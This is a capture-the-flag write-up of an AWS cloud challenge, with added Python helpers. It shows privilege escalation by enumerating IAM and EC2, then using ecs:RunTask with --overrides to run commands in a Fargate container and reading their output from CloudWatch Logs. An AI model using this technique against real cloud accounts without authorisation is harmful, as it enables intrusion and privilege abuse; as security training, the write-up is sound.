Microservices (200)

This challenge only gives us a Role ARN. To learn what a Role ARN is and how to use one, you can refer to:
To use the Role ARN I will assume the role with a set of credentials that the role's trust policy accepts; I will use the credentials obtained in the previous challenge.
We will have a config file like the following:

From this config I will assume the role, so that cloud1 can access the resources the role allows, with the following command:
aws sts assume-role --role-arn arn:aws:iam::543303393859:role/TetCtf2Stack-EcsTaskRole8DFA0181-qubavXABtWiL --role-session-name test --profile cloud2

Once we have the keys, configure them as in challenge 1 (the resulting profile is called test in the commands below).

First I check the policy to see what I can do with the role the challenge gave us.

$ aws iam get-role-policy --role-name TetCtf2Stack-EcsTaskRole8DFA0181-qubavXABtWiL --policy-name EcsTaskRoleDefaultPolicy50882C77 --profile test
{
"RoleName": "TetCtf2Stack-EcsTaskRole8DFA0181-qubavXABtWiL",
"PolicyName": "EcsTaskRoleDefaultPolicy50882C77",
"PolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Action": "ecs:RunTask",
"Resource": "arn:aws:ecs:eu-west-2:543303393859:task-definition/TetCtf2StackCtfTaskDefB40F186A:3",
"Effect": "Allow"
},
{
"Action": [
"iam:ListRolePolicies",
"iam:GetRolePolicy",
"ecs:ListClusters",
"ec2:DescribeSecurityGroups",
"ec2:DescribeSubnets"
],
"Resource": "*",
"Effect": "Allow"
},
{
"Effect": "Allow",
"Action": "iam:PassRole",
"Resource": [
"arn:aws:iam::543303393859:role/TetCtf2Stack-EcsExecutionRoleFD93B7A2-O8bY2QagMK25",
"arn:aws:iam::543303393859:role/TetCtf2Stack-CtfTaskDefTaskRoleD17F896A-vJxGKfIFhChH"
]
},
{
"Sid": "Statement1",
"Effect": "Allow",
"Action": [
"logs:GetLogEvents",
"logs:DescribeLogStreams",
"logs:DescribeLogGroups"
],
"Resource": [
"arn:aws:logs:eu-west-2:543303393859:*"
]
}
]
}
}
From the above we learn:
We can run RunTask on ECS (and only on one specific task definition).
We can enumerate IAM and EC2.
We can perform PassRole. iam:PassRole is the permission that lets a principal hand an IAM role to an AWS service, here to ECS as the task's execution role and task role when we call RunTask; it is limited to two roles:
role/TetCtf2Stack-EcsExecutionRoleFD93B7A2-O8bY2QagMK25
and role/TetCtf2Stack-CtfTaskDefTaskRoleD17F896A-vJxGKfIFhChH
Finally we can read logs (at this point I did not yet know what these logs were).
Note: looking closely, every action we are allowed to perform has eu-west-2 as its region. Therefore we must reconfigure the region to eu-west-2.
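To make the policy review above repeatable, here is an added example (my code, not the write-up's and not an AWS tool) that parses the policy document returned by get-role-policy, reports whether the ecs:RunTask + iam:PassRole code-execution path exists, which task definitions and roles it covers, and which regions the resource ARNs name. The policy text is the one shown above; the function names are my own.

```python
"""Triage an IAM policy for the ecs:RunTask + iam:PassRole code-execution path.

Added example for this write-up, not part of the challenge or the AWS CLI. The
policy document is the one returned by get-role-policy above; helper names are mine.
"""
import fnmatch
import json

POLICY = json.loads(r'''
{"Version": "2012-10-17", "Statement": [
  {"Action": "ecs:RunTask",
   "Resource": "arn:aws:ecs:eu-west-2:543303393859:task-definition/TetCtf2StackCtfTaskDefB40F186A:3",
   "Effect": "Allow"},
  {"Action": ["iam:ListRolePolicies", "iam:GetRolePolicy", "ecs:ListClusters",
              "ec2:DescribeSecurityGroups", "ec2:DescribeSubnets"],
   "Resource": "*", "Effect": "Allow"},
  {"Effect": "Allow", "Action": "iam:PassRole",
   "Resource": ["arn:aws:iam::543303393859:role/TetCtf2Stack-EcsExecutionRoleFD93B7A2-O8bY2QagMK25",
                "arn:aws:iam::543303393859:role/TetCtf2Stack-CtfTaskDefTaskRoleD17F896A-vJxGKfIFhChH"]},
  {"Sid": "Statement1", "Effect": "Allow",
   "Action": ["logs:GetLogEvents", "logs:DescribeLogStreams", "logs:DescribeLogGroups"],
   "Resource": ["arn:aws:logs:eu-west-2:543303393859:*"]}
]}''')


def _as_list(value):
    """IAM lets Action/Resource be a string or a list; normalise to a list."""
    return value if isinstance(value, list) else [value]


def allowed(policy):
    """(action pattern, resource) pairs from unconditional Allow statements.

    Conditional statements are skipped on purpose: a Condition such as
    iam:PassedToService is the usual guardrail on PassRole and needs a manual
    read, so they are surfaced separately by conditional_statements().
    """
    pairs = []
    for st in policy["Statement"]:
        if st.get("Effect") != "Allow" or "Condition" in st:
            continue
        for action in _as_list(st.get("Action", [])):
            for resource in _as_list(st.get("Resource", [])):
                pairs.append((action, resource))
    return pairs


def conditional_statements(policy):
    return [st for st in policy["Statement"] if "Condition" in st]


def grants(policy, action):
    """Resources on which `action` is allowed ('*' means any). IAM action names
    are case-insensitive and policies may use '*' wildcards such as "ecs:*"."""
    return sorted({res for pat, res in allowed(policy)
                   if fnmatch.fnmatchcase(action.lower(), pat.lower())})


def regions(policy):
    """Regions named in allowed resource ARNs (arn:partition:service:region:account:...).
    Global services such as IAM leave the field empty and '*' has no region."""
    found = set()
    for _, res in allowed(policy):
        parts = res.split(":", 5)
        if len(parts) == 6 and parts[0] == "arn" and parts[3]:
            found.add(parts[3])
    return found


def run_task_privesc(policy):
    """If the principal may both launch an ECS task and pass roles to it, return
    (task definitions, passable roles): with --overrides it can then run arbitrary
    commands with those roles' permissions. Otherwise return None."""
    task_defs = grants(policy, "ecs:RunTask")
    roles = grants(policy, "iam:PassRole")
    if task_defs and roles:
        return task_defs, roles
    return None


if __name__ == "__main__":
    hit = run_task_privesc(POLICY)
    if hit:
        task_defs, roles = hit
        print("RunTask on:", *task_defs, sep="\n  ")
        print("PassRole for:", *roles, sep="\n  ")
    print("regions seen:", ", ".join(sorted(regions(POLICY))) or "none")
    print("read-only enumeration:",
          [a for a in ("ecs:ListClusters", "ec2:DescribeSecurityGroups",
                       "ec2:DescribeSubnets", "logs:GetLogEvents") if grants(POLICY, a)])
```

The region set is what tells you to switch the CLI to eu-west-2 before anything else; the privesc check is the same one you would run on any task role found during an engagement, since RunTask plus PassRole on a task role is effectively code execution as that role.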
I will go through each capability from top to bottom.
First we can execute ecs:RunTask; you can learn more about the ECS service in AWS here.
Put simply, ECS is the service for running and managing Docker containers on the Amazon cloud. A task is a running instance of a task definition, which holds one or more containers each doing its own job, and a service keeps a set of such tasks running together (which is also why this challenge is called Microservices).
My first idea was to launch the task and study its behaviour so I could abuse it. For this challenge, to launch the task we need:
--task-definition: already known from the policy
--cluster: obtainable with ecs:ListClusters (a cluster can be understood simply as a group of containers)
--network-configuration: we also have enough information for this option
Get the cluster name

The format of --network-configuration is as follows (the shorthand form is also visible in the run-task command further down):

We can easily get these via ec2:DescribeSecurityGroups and ec2:DescribeSubnets.
GroupId
$ aws ec2 describe-security-groups --profile test
{
"SecurityGroups": [
{
"Description": "Security Group for CTF ECS tasks",
"GroupName": "TetCtf2Stack-CtfSecurityGroupA7633774-1DAGZMZKB7EY4",
"IpPermissions": [],
"OwnerId": "543303393859",
"GroupId": "sg-0f6583e3532e99a62",
"IpPermissionsEgress": [
{
"FromPort": 252,
"IpProtocol": "icmp",
"IpRanges": [
{
"CidrIp": "255.255.255.255/32",
"Description": "Disallow all traffic"
}
],
"Ipv6Ranges": [],
"PrefixListIds": [],
"ToPort": 86,
"UserIdGroupPairs": []
}
],
"Tags": [
{
"Key": "aws:cloudformation:stack-name",
"Value": "TetCtf2Stack"
},
{
"Key": "aws:cloudformation:logical-id",
"Value": "CtfSecurityGroupA7633774"
},
{
"Key": "aws:cloudformation:stack-id",
"Value": "arn:aws:cloudformation:eu-west-2:543303393859:stack/TetCtf2Stack/54b3d720-bc03-11ee-9235-06cbbf25eaf7"
}
],
"VpcId": "vpc-07e8cd02a7c992f43"
},
{
"Description": "default VPC security group",
"GroupName": "default",
"IpPermissions": [
{
"IpProtocol": "-1",
"IpRanges": [],
"Ipv6Ranges": [],
"PrefixListIds": [],
"UserIdGroupPairs": [
{
"GroupId": "sg-2a62a941",
"UserId": "543303393859"
}
]
}
],
"OwnerId": "543303393859",
"GroupId": "sg-2a62a941",
"IpPermissionsEgress": [
{
"IpProtocol": "-1",
"IpRanges": [
{
"CidrIp": "0.0.0.0/0"
}
],
"Ipv6Ranges": [],
"PrefixListIds": [],
"UserIdGroupPairs": []
}
],
"VpcId": "vpc-5744993f"
},
{
"Description": "default VPC security group",
"GroupName": "default",
"IpPermissions": [],
"OwnerId": "543303393859",
"GroupId": "sg-0e0be2c862c2b3241",
"IpPermissionsEgress": [],
"VpcId": "vpc-07e8cd02a7c992f43"
},
{
"Description": "GET FLAG",
"GroupName": "TetCTF-GETFLAG",
"IpPermissions": [],
"OwnerId": "543303393859",
"GroupId": "sg-0636ad23bae6f21e7",
"IpPermissionsEgress": [
{
"IpProtocol": "-1",
"IpRanges": [
{
"CidrIp": "0.0.0.0/0"
}
],
"Ipv6Ranges": [],
"PrefixListIds": [],
"UserIdGroupPairs": []
}
],
"VpcId": "vpc-07e8cd02a7c992f43"
}
]
}
Note: we will use the GroupId of the GroupName TetCTF-GETFLAG, sg-0636ad23bae6f21e7. The reason will become clear later.
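The choice of security group is not arbitrary, and the describe-security-groups output already contains the reason: a Fargate task has to pull its image from ECR and the awslogs driver has to reach CloudWatch Logs, both over HTTPS, so the task only starts and logs with a group whose egress reaches the internet. Below is an added example (my code, not the write-up's) that classifies each group's egress and picks the usable one per VPC; the group data is condensed from the output above with ingress rules and tags dropped. The odd icmp 252/86 rule to 255.255.255.255/32 described as "Disallow all traffic" is the placeholder rule the AWS CDK emits for a security group created with allowAllOutbound: false, and it is treated as blocked.

```python
"""Which security group can a Fargate task actually run and log with?

Added example for this write-up, not the author's code. The four groups are
condensed from the describe-security-groups output above (ingress and tags
dropped); the function names are my own.
"""
import ipaddress

GROUPS = [
    {"GroupName": "TetCtf2Stack-CtfSecurityGroupA7633774-1DAGZMZKB7EY4",
     "GroupId": "sg-0f6583e3532e99a62", "VpcId": "vpc-07e8cd02a7c992f43",
     "IpPermissionsEgress": [{"IpProtocol": "icmp", "FromPort": 252, "ToPort": 86,
                              "IpRanges": [{"CidrIp": "255.255.255.255/32",
                                            "Description": "Disallow all traffic"}]}]},
    {"GroupName": "default", "GroupId": "sg-2a62a941", "VpcId": "vpc-5744993f",
     "IpPermissionsEgress": [{"IpProtocol": "-1", "IpRanges": [{"CidrIp": "0.0.0.0/0"}]}]},
    {"GroupName": "default", "GroupId": "sg-0e0be2c862c2b3241", "VpcId": "vpc-07e8cd02a7c992f43",
     "IpPermissionsEgress": []},
    {"GroupName": "TetCTF-GETFLAG", "GroupId": "sg-0636ad23bae6f21e7", "VpcId": "vpc-07e8cd02a7c992f43",
     "IpPermissionsEgress": [{"IpProtocol": "-1", "IpRanges": [{"CidrIp": "0.0.0.0/0"}]}]},
]


def rule_reaches_public_https(rule):
    """True if one egress rule lets TCP/443 out to the whole internet.

    A Fargate task pulls its image from ECR and the awslogs driver ships stdout to
    CloudWatch Logs, both over HTTPS to public endpoints (absent VPC endpoints).
    """
    proto = rule.get("IpProtocol")
    if proto not in ("-1", "tcp", "6"):          # "-1" = all protocols, 6 = TCP
        return False
    if proto != "-1" and not rule.get("FromPort", 0) <= 443 <= rule.get("ToPort", 65535):
        return False
    cidrs = [r["CidrIp"] for r in rule.get("IpRanges", [])]
    cidrs += [r["CidrIpv6"] for r in rule.get("Ipv6Ranges", [])]
    # Only 0.0.0.0/0 or ::/0 counts; a /32 to the broadcast address (the CDK
    # "Disallow all traffic" placeholder) or a private range does not.
    return any(ipaddress.ip_network(c, strict=False).prefixlen == 0 for c in cidrs)


def classify_egress(group):
    rules = group.get("IpPermissionsEgress", [])
    if not rules:
        return "none"        # every egress rule removed: nothing leaves the ENI
    if any(rule_reaches_public_https(r) for r in rules):
        return "open"
    return "blocked"         # rules exist but none reaches the internet on 443


def task_capable_groups(groups, vpc_id):
    """GroupIds in vpc_id a Fargate task can run (and log) with. The subnets and
    security groups passed to run-task must belong to the same VPC."""
    return [g["GroupId"] for g in groups
            if g["VpcId"] == vpc_id and classify_egress(g) == "open"]


if __name__ == "__main__":
    for g in GROUPS:
        print(f'{g["GroupId"]:22} {g["VpcId"]:22} {classify_egress(g):8} {g["GroupName"]}')
    print("usable for the task:", task_capable_groups(GROUPS, "vpc-07e8cd02a7c992f43"))
```

For the CTF VPC vpc-07e8cd02a7c992f43 only TetCTF-GETFLAG comes out as "open", which is why a task launched with the stack's own group produces no log stream: it never gets far enough to send one.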
SubnetId

Execute ecs:RunTask

However it still did not work because something was missing. After some googling I learned that there are three launch types for running containers: EC2, FARGATE and EXTERNAL. For this challenge only FARGATE can run the task.
$ aws ecs run-task --task-definition TetCtf2StackCtfTaskDefB40F186A:3 --cluster CtfEcsCluster --network-configuration "awsvpcConfiguration={subnets=[subnet-05dc4f12caf437c48],securityGroups=[sg-0636ad23bae6f21e7]}" --launch-type FARGATE --profile test
{
"tasks": [
{
"attachments": [
{
"id": "30cb9cbf-cfa7-4ac6-be42-5dcf94e0bb6a",
"type": "ElasticNetworkInterface",
"status": "PRECREATED",
"details": [
{
"name": "subnetId",
"value": "subnet-05dc4f12caf437c48"
}
]
}
],
"attributes": [
{
"name": "ecs.cpu-architecture",
"value": "x86_64"
}
],
"availabilityZone": "eu-west-2a",
"clusterArn": "arn:aws:ecs:eu-west-2:543303393859:cluster/CtfEcsCluster",
"containers": [
{
"containerArn": "arn:aws:ecs:eu-west-2:543303393859:container/CtfEcsCluster/cf2c5c1b8c0041b699078d1aeb485503/2e74da1d-75b0-4614-8804-0d7681daca30",
"taskArn": "arn:aws:ecs:eu-west-2:543303393859:task/CtfEcsCluster/cf2c5c1b8c0041b699078d1aeb485503",
"name": "CtfContainer",
"image": "543303393859.dkr.ecr.eu-west-2.amazonaws.com/tet-ctf:flag",
"lastStatus": "PENDING",
"networkInterfaces": [],
"cpu": "0"
}
],
"cpu": "1024",
"createdAt": 1706716630.41,
"desiredStatus": "RUNNING",
"enableExecuteCommand": false,
"group": "family:TetCtf2StackCtfTaskDefB40F186A",
"lastStatus": "PROVISIONING",
"launchType": "FARGATE",
"memory": "2048",
"overrides": {
"containerOverrides": [
{
"name": "CtfContainer"
}
],
"inferenceAcceleratorOverrides": []
},
"platformVersion": "1.4.0",
"platformFamily": "Linux",
"tags": [],
"taskArn": "arn:aws:ecs:eu-west-2:543303393859:task/CtfEcsCluster/cf2c5c1b8c0041b699078d1aeb485503",
"taskDefinitionArn": "arn:aws:ecs:eu-west-2:543303393859:task-definition/TetCtf2StackCtfTaskDefB40F186A:3",
"version": 1,
"ephemeralStorage": {
"sizeInGiB": 20
}
}
],
"failures": []
}
After launching the task I was completely stuck and did not know what to do next.
Remembering that the challenge also allows PassRole and reading logs, I checked both again, and the result from the logs looked quite promising.

I noticed there are logs under /ecs/tet-ctf:*, i.e. for the very task I ran. Running the task again and checking the logs gives us the following (if we launch the task with a GroupId other than that of TetCTF-GETFLAG we see no logs at all: in the describe-security-groups output above that is the only group in the VPC whose egress lets the task reach CloudWatch Logs).

At this point I was stuck again and did not know what to do with this pile of logs.
Going back to the run-task behaviour, I wondered whether there was some feature that could help execute a command. I searched the whole day without result, but when I asked ChatGPT I got my answer 😢😢😢

The --overrides option lets us override the command the container executes at start-up. However the executed command does not return any output:
$ aws ecs run-task --task-definition TetCtf2StackCtfTaskDefB40F186A:3 --cluster CtfEcsCluster --network-configuration "awsvpcConfiguration={subnets=[subnet-05dc4f12caf437c48],securityGroups=[sg-0636ad23bae6f21e7]}" --launch-type FARGATE --profile test --overrides '{"containerOverrides": [{"name": "CtfContainer", "command": ["id"]}]}'
{
"tasks": [
{
"attachments": [
{
"id": "d39de2d8-14a4-42eb-934b-bef7704c3dc5",
"type": "ElasticNetworkInterface",
"status": "PRECREATED",
"details": [
{
"name": "subnetId",
"value": "subnet-05dc4f12caf437c48"
}
]
}
],
"attributes": [
{
"name": "ecs.cpu-architecture",
"value": "x86_64"
}
],
"availabilityZone": "eu-west-2a",
"clusterArn": "arn:aws:ecs:eu-west-2:543303393859:cluster/CtfEcsCluster",
"containers": [
{
"containerArn": "arn:aws:ecs:eu-west-2:543303393859:container/CtfEcsCluster/eecf1f8af5c24f34be5bc4507c837909/7bc76a3c-9f5b-4e1a-a8e8-bcc9dd1a3c5e",
"taskArn": "arn:aws:ecs:eu-west-2:543303393859:task/CtfEcsCluster/eecf1f8af5c24f34be5bc4507c837909",
"name": "CtfContainer",
"image": "543303393859.dkr.ecr.eu-west-2.amazonaws.com/tet-ctf:flag",
"lastStatus": "PENDING",
"networkInterfaces": [],
"cpu": "0"
}
],
"cpu": "1024",
"createdAt": 1706716669.563,
"desiredStatus": "RUNNING",
"enableExecuteCommand": false,
"group": "family:TetCtf2StackCtfTaskDefB40F186A",
"lastStatus": "PROVISIONING",
"launchType": "FARGATE",
"memory": "2048",
"overrides": {
"containerOverrides": [
{
"name": "CtfContainer",
"command": [
"id"
]
}
],
"inferenceAcceleratorOverrides": []
},
"platformVersion": "1.4.0",
"platformFamily": "Linux",
"tags": [],
"taskArn": "arn:aws:ecs:eu-west-2:543303393859:task/CtfEcsCluster/eecf1f8af5c24f34be5bc4507c837909",
"taskDefinitionArn": "arn:aws:ecs:eu-west-2:543303393859:task-definition/TetCtf2StackCtfTaskDefB40F186A:3",
"version": 1,
"ephemeralStorage": {
"sizeInGiB": 20
}
}
],
"failures": []
}
I also tried checking for an outbound connection, with no result (too predictable).
This is where the logs come into their own: I checked the logs and got the command output.
Now all that is left is to find the flag.
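The two halves of the technique above, overriding the container command and reading the result back out of CloudWatch Logs, are small enough to script. The following is an added example (my code, not the write-up's and not an AWS SDK): it builds the --overrides document, derives the awslogs stream name for a task, and reassembles a command's output from a get-log-events response. The task ARN and container name are taken from the run-task output above; the stream prefix "ecs" and the sample get-log-events response are constructed assumptions.

```python
"""Turn ecs:RunTask --overrides into a command channel and read its output back.

Added example for this write-up, not the author's code or an AWS SDK. The task ARN
and container name come from the run-task output above; the awslogs stream prefix
"ecs" and the sample get-log-events response are constructed assumptions.
"""
import json

TASK_ARN = "arn:aws:ecs:eu-west-2:543303393859:task/CtfEcsCluster/eecf1f8af5c24f34be5bc4507c837909"
CONTAINER = "CtfContainer"

# Constructed: what `aws logs get-log-events` might return for the task, with the
# events deliberately out of order.
SAMPLE_GET_LOG_EVENTS = {
    "events": [
        {"timestamp": 1706716702000, "message": "/flag.txt", "ingestionTime": 1706716703000},
        {"timestamp": 1706716701000, "message": "uid=0(root) gid=0(root) groups=0(root)",
         "ingestionTime": 1706716703000},
    ],
    "nextForwardToken": "f/0", "nextBackwardToken": "b/0",
}


def overrides(container, argv):
    """JSON for --overrides: argv replaces the image CMD. If the image defines an
    ENTRYPOINT it still runs first and receives argv as its arguments."""
    return json.dumps({"containerOverrides": [{"name": container, "command": list(argv)}]})


def shell_override(container, script):
    """Wrap a script in sh -c so pipes, globs and redirects work in one run-task call."""
    return overrides(container, ["sh", "-c", script])


def task_id(task_arn):
    """The last path element of a task ARN: .../task/<cluster>/<task-id>."""
    return task_arn.rsplit("/", 1)[1]


def awslogs_stream(prefix, container, task_arn):
    """Stream name the awslogs driver uses when awslogs-stream-prefix is set:
    <prefix>/<container name>/<task id>."""
    return f"{prefix}/{container}/{task_id(task_arn)}"


def command_output(response):
    """Reassemble the command's stdout/stderr from a get-log-events response: one
    event per line, sorted by timestamp since pages and streams may interleave."""
    events = sorted(response.get("events", []), key=lambda e: e["timestamp"])
    return "\n".join(e["message"] for e in events)


if __name__ == "__main__":
    print("--overrides", shell_override(CONTAINER, "id; ls / 2>&1"))
    print("--log-stream-name", awslogs_stream("ecs", CONTAINER, TASK_ARN))
    print(command_output(SAMPLE_GET_LOG_EVENTS))
```

In practice you paste the first line into run-task, wait for the task to reach RUNNING or STOPPED, then call aws logs get-log-events with the log group from describe-log-groups and the stream name computed here; because the awslogs driver captures both stdout and stderr, a 2>&1 is only needed when ordering matters.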
